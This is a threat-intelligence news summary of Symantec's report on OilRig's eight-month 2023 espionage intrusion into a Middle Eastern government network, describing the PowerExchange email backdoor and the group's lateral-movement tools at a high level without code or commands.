OilRig's 8-Month Stay Inside a Middle Eastern Government Network

Category: Threat Actor Activity | Industry: Government | Source: Symantec

Over the span of eight months, an intrusion orchestrated by the Iranian espionage group, known under aliases as OilRig, APT34, and Crambus, executed a persistent operation targeting a government entity in the Middle East, running from February to September 2023. Researchers from Symantec Threat Hunter Team report the attackers managed to exfiltrate files and passwords, with one instance involving the installation of a PowerShell backdoor named PowerExchange. This backdoor was used to monitor incoming emails from an Exchange Server, allowing the threat actors to execute commands via email communication while discretely forwarding results to their control. Symantec discovered the threat actors were able to compromise "at least 12 computers and there is evidence that the attackers deployed backdoors and keyloggers on dozens more."

The attackers sporadically ran malicious activity from February 1st, 2023 to September 9th, 2023. During this timeframe, OilRig demonstrated a preference for stealth and sophisticated techniques during this operation, including the use of Plink, Mimikatz, and configuring port-forwarding rules to facilitate remote access via Remote Desktop Protocol (RDP). The attackers also manipulated Windows firewall rules to enable remote access, deployed various scripts (both BAT and PowerShell), and moved the scripts throughout the network. Often when pivoting between hosts on the network, the attackers would run netstat to understand the system's network connectivity and establish connections with RDP or Plink.

A noticeable gap appeared from May 8th until June 4th in which malicious activity on the network halted. However, it was four months after the first sign of malicious activity did the attackers deployed their PowerExchange script - setapp.ps1 which is capable of executing commands issued by the attackers. The attackers were able to achieve this "by logging into compromised mailboxes on an Exchange Server and monitoring for incoming emails from the attackers. Email’s that contain “@@” in the subject line are read by Backdoor.PowerExchange and have the ability to execute commands received from the attackers, effectively using the Exchange Server as a C&C," as explained by Symantec. Following this notable event, they initiated their previous patterns of activities until September 9th when their activity on the compromised network ceased.